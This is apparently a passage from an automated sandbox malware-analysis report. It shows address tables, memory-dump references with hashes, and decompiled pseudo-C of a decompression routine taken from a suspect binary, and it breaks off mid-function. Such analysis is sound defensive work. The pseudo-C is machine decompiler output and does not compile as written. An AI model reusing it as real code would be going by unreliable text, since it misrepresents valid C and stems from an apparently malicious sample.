                          0x0040686e
                          0x00406871
                          0x00406877
                          0x00406879
                          0x00406879
                          0x00406879
                          0x0040687c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406969
                          0x0040696d
                          0x0040698f
                          0x00406992
                          0x0040699c
                          0x0040699f
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x0040699f
                          0x0040696f
                          0x00406972
                          0x00406976
                          0x00406979
                          0x00406979
                          0x0040697c
                          0x00000000
                          0x00000000
                          0x00406a26
                          0x00406a2a
                          0x00406a48
                          0x00406a48
                          0x00406a48
                          0x00406a4f
                          0x00406a56
                          0x00406a5d
                          0x00406a5d
                          0x00000000
                          0x00406a5d
                          0x00406a2c
                          0x00406a2f
                          0x00406a32
                          0x00406a35
                          0x00406a3c
                          0x00406980
                          0x00406980
                          0x00406983
                          0x00000000
                          0x00000000
                          0x00406b17
                          0x00406b1a
                          0x00406a1b
                          0x00000000
                          0x00000000
                          0x00406751
                          0x00406753
                          0x0040675a
                          0x0040675b
                          0x0040675d
                          0x00406760
                          0x00000000
                          0x00000000
                          0x00406768
                          0x0040676b
                          0x0040676e
                          0x00406770
                          0x00406772
                          0x00406772
                          0x00406773
                          0x00406776
                          0x0040677d
                          0x00406780
                          0x0040678e
                          0x00000000
                          0x00000000
                          0x00406a64
                          0x00406a64
                          0x00406a67
                          0x00406a6e
                          0x00000000
                          0x00000000
                          0x00406a73
                          0x00406a73
                          0x00406a77
                          0x00406baf
                          0x00000000
                          0x00406baf
                          0x00406a7d
                          0x00406a80
                          0x00406a83
                          0x00406a87
                          0x00406a8a
                          0x00406a90
                          0x00406a92
                          0x00406a92
                          0x00406a92
                          0x00406a95
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a9b
                          0x00406a9b
                          0x00406a9f
                          0x00406aff
                          0x00406b02
                          0x00406b07
                          0x00406b08
                          0x00406b0a
                          0x00406b0c
                          0x00406b0f
                          0x00406a1b
                          0x00406a1b
                          0x00000000
                          0x00406a21
                          0x00406a1b
                          0x00406aa1
                          0x00406aa7
                          0x00406aaa
                          0x00406aad
                          0x00406ab0
                          0x00406ab3
                          0x00406ab6
                          0x00406ab9
                          0x00406abc
                          0x00406abf
                          0x00406ac2
                          0x00406adb
                          0x00406ade
                          0x00406ae1
                          0x00406ae4
                          0x00406ae8
                          0x00406aea
                          0x00406aea
                          0x00406aeb
                          0x00406aee
                          0x00406ac4
                          0x00406ac4
                          0x00406acc
                          0x00406ad1
                          0x00406ad3
                          0x00406ad6
                          0x00406ad6
                          0x00406af1
                          0x00406af8
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406796
                          0x00406799
                          0x004067cf
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x00406902
                          0x00406902
                          0x00406905
                          0x00406907
                          0x00406b91
                          0x00000000
                          0x00406b91
                          0x0040690d
                          0x00406910
                          0x00000000
                          0x00000000
                          0x00406916
                          0x0040691a
                          0x0040691d
                          0x0040691d
                          0x0040691d
                          0x00000000
                          0x0040691d
                          0x0040679b
                          0x0040679d
                          0x0040679f
                          0x004067a1
                          0x004067a4
                          0x004067a5
                          0x004067a7
                          0x004067a9
                          0x004067ac
                          0x004067af
                          0x004067c5
                          0x004067ca
                          0x00406802
                          0x00406802
                          0x00406806
                          0x00406832
                          0x00406834
                          0x0040683b
                          0x0040683e
                          0x00406841
                          0x00406841
                          0x00406846
                          0x00406846
                          0x00406848
                          0x0040684b
                          0x00406852
                          0x00406855
                          0x00406882
                          0x00406882
                          0x00406885
                          0x00406888
                          0x004068fc
                          0x004068fc
                          0x004068fc
                          0x00000000
                          0x004068fc
                          0x0040688a
                          0x00406890
                          0x00406893
                          0x00406896
                          0x00406899
                          0x0040689c
                          0x0040689f
                          0x004068a2
                          0x004068a5
                          0x004068a8
                          0x004068ab
                          0x004068c4
                          0x004068c6
                          0x004068c9
                          0x004068ca
                          0x004068cd
                          0x004068cf
                          0x004068d2
                          0x004068d4
                          0x004068d6
                          0x004068d9
                          0x004068db
                          0x004068de
                          0x004068e2
                          0x004068e4
                          0x004068e4
                          0x004068e5
                          0x004068e8
                          0x004068eb
                          0x004068ad
                          0x004068ad
                          0x004068b5
                          0x004068ba
                          0x004068bc
                          0x004068bf
                          0x004068bf
                          0x004068ee
                          0x004068f5
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x00000000
                          0x004068f7
                          0x00000000
                          0x004068f7
                          0x004068f5
                          0x00406808
                          0x0040680b
                          0x0040680d
                          0x00406810
                          0x00406813
                          0x00406816
                          0x00406818
                          0x0040681b
                          0x0040681e
                          0x0040681e
                          0x00406821
                          0x00406821
                          0x00406824
                          0x0040682b
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x00000000
                          0x0040682d
                          0x00000000
                          0x0040682d
                          0x0040682b
                          0x004067b1
                          0x004067b4
                          0x004067b6
                          0x004067b9
                          0x00000000
                          0x00000000
                          0x00406518
                          0x00406518
                          0x0040651c
                          0x00406b61
                          0x00000000
                          0x00406b61
                          0x00406522
                          0x00406525
                          0x00406528
                          0x0040652b
                          0x0040652e
                          0x00406531
                          0x00406534
                          0x00406536
                          0x00406539
                          0x0040653c
                          0x0040653f
                          0x00406541
                          0x00406541
                          0x00406541
                          0x00000000
                          0x00000000
                          0x004066a3
                          0x004066a3
                          0x004066a7
                          0x00406b6d
                          0x00000000
                          0x00406b6d
                          0x004066ad
                          0x004066b0
                          0x004066b3
                          0x004066b6
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066be
                          0x004066c1
                          0x004066c4
                          0x004066c7
                          0x004066ca
                          0x004066cb
                          0x004066cd
                          0x004066cd
                          0x004066cd
                          0x004066d0
                          0x004066d3
                          0x004066d6
                          0x004066d9
                          0x004066d9
                          0x004066d9
                          0x004066dc
                          0x004066de
                          0x004066de
                          0x00000000
                          0x00000000
                          0x00406920
                          0x00406920
                          0x00406920
                          0x00406924
                          0x00000000
                          0x00000000
                          0x0040692a
                          0x0040692d
                          0x00406930
                          0x00406933
                          0x00406935
                          0x00406935
                          0x00406935
                          0x00406938
                          0x0040693b
                          0x0040693e
                          0x00406941
                          0x00406944
                          0x00406947
                          0x00406948
                          0x0040694a
                          0x0040694a
                          0x0040694a
                          0x0040694d
                          0x00406950
                          0x00406953
                          0x00406956
                          0x00406959
                          0x0040695d
                          0x0040695f
                          0x00406962
                          0x00000000
                          0x00406964
                          0x004066e1
                          0x004066e1
                          0x00000000
                          0x004066e1
                          0x00406962
                          0x00406b97
                          0x00000000
                          0x00000000
                          0x004061c6
                          0x00406bce
                          0x00406bce
                          0x00000000
                          0x00406bce
                          0x00406a1b
                          0x004069a2
                          0x0040699f
                          0x00000000
                          0x004066f4

                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                          • Instruction ID: 7be6eb69932b41c0b27de07e5fb880b338722213318b425ba270fb710fdbb197
                          • Opcode Fuzzy Hash: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                          • Instruction Fuzzy Hash: FE714671E00228CBDF28CF98C8447ADBBB1FB44305F15816ED856BB281C778AA96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040663C Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E0040663C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
